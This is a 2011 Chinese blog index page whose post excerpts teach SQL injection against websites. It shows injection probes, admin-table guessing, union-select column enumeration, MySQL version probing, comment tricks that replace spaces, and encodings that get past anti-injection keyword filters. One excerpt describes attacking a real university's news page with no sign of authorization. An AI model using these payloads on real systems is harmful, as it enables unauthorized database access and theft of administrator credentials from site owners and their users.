摘要: .判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0(select count(*) from *) and 0(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到00)-- and 1=(select count(*) from admin where len(用户字段名称name)>0) and 1=(select count(*) from admin where len(_blank>密码字段 阅读全文
posted @ 2011-06-01 13:16 WHaa_(T_T) 阅读(258) 评论(0) 推荐(0) 编辑
摘要: 在谷歌搜索了php的站,开始找目标,无意之间看到一个大学的,****外贸大学。打开后,找了个新闻页面, 找了几个以php?id=** 的页面都米有找到,呵呵呵,现在还米有太顺手的工具,麻烦啊!http://www.*****.edu.cn/****/*******/showarticle.php?id=** 呵呵!人品还不错啊!找了几个后碰到了一个,随手扔了个单引号,出现了不正常的页面,).[attach]360[/attach] 看来有戏啊!and 1=1正常, (这里我直接用的/**/代替空格,有的过略了空格再回过来头改变麻烦,我之间用/**/)那么再来看看and 1=2,返回不正常了, 阅读全文
posted @ 2011-06-01 12:23 WHaa_(T_T) 阅读(430) 评论(0) 推荐(0) 编辑
摘要: 大家都知道oracle比较大,11g的安装程序大约在1.4g左右,可能大家遇到oracle的库比较少,oracle+jsp的搭配的比较好... oracle系统库默认的用户有sys,system,internal,scott,前三个权限都是system权限.. 先说下数据库的注释:access支持null和%00注释; mssql支持--和;的注视;mysql支持/*的支持;oracle支持--的注视 这里也许大家说了如果mssql过滤了;注视,该怎么区别oracle和mssql数据库呢,如果是oracle的库,一旦出错的话,很多时候就会出现oracle.odbc等之类的存储过程出错的语... 阅读全文
posted @ 2011-06-01 11:56 WHaa_(T_T) 阅读(420) 评论(0) 推荐(0) 编辑
摘要: 1.判断是否存在注入,加';and 1=1;and 1=2 2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询 3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10 4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替。 5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.us 阅读全文
posted @ 2011-06-01 10:30 WHaa_(T_T) 阅读(310) 评论(0) 推荐(0) 编辑
摘要: 经过我的收集,大部分的防注入程序都过滤了以下关键字: and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | = 而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。 对于关键字的过滤,以下是我收集的以及我个人的一些想法。 1、运用编码技术绕过 如URLEncode编码,ASCII编码绕过。例如or 1=1即 %6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CH... 阅读全文
posted @ 2011-06-01 10:14 WHaa_(T_T) 阅读(789) 评论(7) 推荐(0) 编辑